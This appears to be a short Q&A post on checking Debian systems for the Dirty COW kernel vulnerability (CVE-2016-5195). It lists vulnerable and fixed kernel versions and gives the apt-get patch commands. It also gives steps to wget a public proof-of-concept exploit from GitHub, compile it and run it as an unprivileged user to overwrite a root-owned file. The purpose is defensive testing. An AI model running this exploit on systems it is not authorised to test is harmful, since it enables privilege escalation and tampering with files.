According to security-tracker.debian, You need to run uname -a
and verify your current kernel version .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
This vulnerability is patched under debian , by upgrading your system :
apt-get update
apt-get upgrade
apt-get dist-upgrade
Edit
How to make sure that my operating system is not affected by CVE-2016-5195?
You can try the following tutorial.
Download the exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
As root : Create the foo
file:
su
echo this is not a test > foo
As user :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verify your file:
cat foo
On vulnerable machine you will get m00000000000000000
as output.